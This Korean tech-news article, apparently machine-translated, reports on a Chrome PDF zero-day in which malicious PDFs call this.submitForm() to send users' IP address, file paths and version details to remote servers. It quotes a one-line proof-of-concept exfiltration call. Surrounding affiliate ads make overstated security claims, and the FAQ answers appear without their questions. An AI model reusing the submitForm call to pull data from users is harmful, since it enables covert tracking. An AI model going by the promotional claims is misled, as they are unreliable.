- EdgeSpot은 Chrome에서 PDF 문서를 악용하는 흥미로운 제로 데이 취약점을 발견했습니다.
- 이 취약성 PC에서 민감한 데이터를 수집하여 해를 끼칠 수 있습니다.
- 탐색 웹 및 클라우드 페이지 다른 도구 및 서비스에 대한 더 많은 통찰력을 얻으십시오.
- 브라우저에 관심이있는 경우 브라우저에 대한 많은 정보를 제공합니다. 브라우저 허브.
Adobe Acrobat Reader를 사용하여 모든 문서를 액세스하고 안전하게 보호하십시오. 이 문서 관리 도구를 사용하면 전자 서명하고 공식 양식을 만들어 업무 시간을 절약 할 수 있습니다. PC 용으로 다운로드하면 다음을 수행 할 수 있습니다.
- 모든 PDF 및 기타 파일 형식 열기, 인쇄 및 편집
- PDF 양식을 더 쉽게 작성
- 필수 문서를 암호화 된 상태로 유지
모든 앱을 특별 가격으로 받으세요!
세계의 Nr.1 문서 관리 소프트웨어가 이제 가격이 저렴하므로 서두르세요!
익스플로잇 탐지 서비스 EdgeSpot이 흥미로운 것을 발견했습니다. 크롬 PDF 문서를 악용하는 제로 데이 취약점.
취약점으로 인해 공격자는 민감한 데이터 수집 Chrome에서 열린 악성 PDF 문서를 사용합니다.
피해자가 Google 크롬에서 각 PDF 파일을 열면 악성 프로그램이 사용자 데이터를 수집하여 백그라운드에서 작동하기 시작합니다.
그런 다음 데이터는 해커가 제어하는 원격 서버로 전달됩니다. 공격자가 어떤 데이터를 빨아들이는지 궁금 할 수 있습니다. 공격자는 PC에서 다음 데이터를 표적으로 삼습니다.
- IP 주소
- 시스템에있는 PDF 파일의 전체 경로
- OS 및 Chrome 버전
맬웨어에 감염된 PDF 파일주의
전문가 더럽혀진 두 도메인 중 하나 readnotify [.] com 또는 burpcollaborator [.] net 데이터를 받고있었습니다.
그들은 공격자들이 this.submitForm () 사용자의 민감한 정보를 수집하는 PDF Javascript API.
최소한의 PoC, 다음과 같은 간단한 API 호출로 테스트했습니다.
this.submitForm (‘ http://google.com/test’) Google 크롬이 개인 데이터를 google.com으로 보내도록합니다.
이 Chrome 버그는 각각 2017 년 10 월과 2018 년 9 월에 각각 유포 된 두 가지 악성 PDF 파일 세트에 의해 악용되었습니다.
특히 수집 된 데이터는 공격자가 향후 공격을 미세 조정하는 데 사용할 수 있습니다. 보고서에 따르면 첫 번째 파일 배치는 ReadNotify의 PDF 추적 서비스를 사용하여 컴파일되었습니다.
사용자는 서비스를 사용하여 사용자보기를 추적 할 수 있습니다. EdgeSpot은 두 번째 PDF 파일 세트의 특성에 대한 세부 정보를 공유하지 않았습니다.
빠른 팁: 브라우저를 Opera로 변경
이 어려운시기에 우리는 모든 단계에서 맬웨어, 피싱 및 트로이 목마의 공격을 받고 있으므로 훨씬 더 경계하고 보호해야합니다.
이것은 Chrome에만 해당되는 문제이므로 다음과 같은 보안 지향 브라우저를 사용하여 위협 및 기타 모든 위협을 피할 수 있습니다. 오페라.
이 브라우저에는 이러한 방해 요소를 제거 할뿐만 아니라 차단하는 광고 차단기가 내장되어 있습니다. 분석 스크립트, 추적 픽셀 및 데이터 수집 방법.
그리고 당신이 어떤 위험으로부터 멀리 떨어져 있다는 것을 절대적으로 확신하고 싶다면, 내장 된 VPN 시간 제한없이 100 % 무료로 사용할 수있는 서비스입니다.
오페라
Opera는 내장 된 광고 차단기와 VPN 서비스를 통해 완벽한 위협 보호를 무료로 제공합니다!
웹 사이트 방문
PDF 취약점으로부터 어떻게 보호받을 수 있습니까?
Adobe Acrobat PRO 다운로드
Adobe와 Chrome은 PDF 파일을 처리 할 때 잘 어울립니다. Chrome 용 Adobe Extension을 설치하면 즐겨 찾는 브라우저를 떠나지 않고도 원하는대로 PDF를 검토하고 조작 할 수 있습니다.
강력한 구조에도 불구하고 표준 버전의 Reader를 사용하는 경우 PDF 파일에 숨겨진 맬웨어가 감지되지 않을 수 있습니다.
보호를 보장하고 해커로부터 데이터를 보호하려면 전문가 버전을 사용하는 것이 좋습니다.
무료는 아니지만 PDF 파일의 향상된 보안을 포함하여 즐길 수있는 과다한 추가 기능에 대해 지불 할 가격은 다소 적습니다.
또한 7 일 무료 평가판이 포함되어있어 구매하기 전에 전체 Pro 경험을 맛볼 수 있습니다.
Adobe Acrobat PRO
Adobe Acrobat PRO를 다운로드하여 맬웨어를 피하십시오. 무료 버전보다 더 많은 기능이 있으며 데이터를 안전하게 유지합니다.
웹 사이트 방문
인터넷 서핑을하는 동안 보안을 유지하려면 네트워크를 보호하기위한 완전한 전용 도구가 필요합니다. 지금 Private Internet Access 설치 자신을 보호하십시오. 검색하는 동안 PC를 공격으로부터 보호하고 IP 주소를 마스킹하며 원치 않는 모든 액세스를 차단합니다.
익스플로잇 탐지 서비스 인 EdgeSpot은 패치가 가까운 장래에 출시 될 것으로 예상되지 않았기 때문에 잠재적 인 위험에 대해 Chrome 사용자에게 경고하기를 원했습니다.
EdgeSpot은 작년에이 취약점에 대해 Google에보고했으며 회사는 4 월 말에 패치를 출시하겠다고 약속했습니다.
그러나 다른 리더 앱을 사용하여 수신 된 PDF 문서를 로컬로 확인하여 문제에 대한 임시 해결 방법을 사용할 수 있습니다.
또는 인터넷에서 시스템 연결을 해제하여 Chrome에서 PDF 문서를 열 수도 있습니다.
자주 묻는 질문
네, 그렇습니다. 하지만 더 넓은 선택을 원한다면 우리의 최고의 선택을 탐색 크롬은둔 확장 이 완전한 가이드.
티여기에 허용하는 많은 확장이 있습니다 PDF 처리. 검사 우리 밖으로 훌륭한 가이드 Chrome을위한 최고의 PDF 확장에 대해.
그렇지 않지만 빠르게 활성화 할 수 있습니다. 여기에 우리 종합 가이드 Chrome에서 QR 코드 생성기를 활성화하는 방법에 대해 설명합니다.
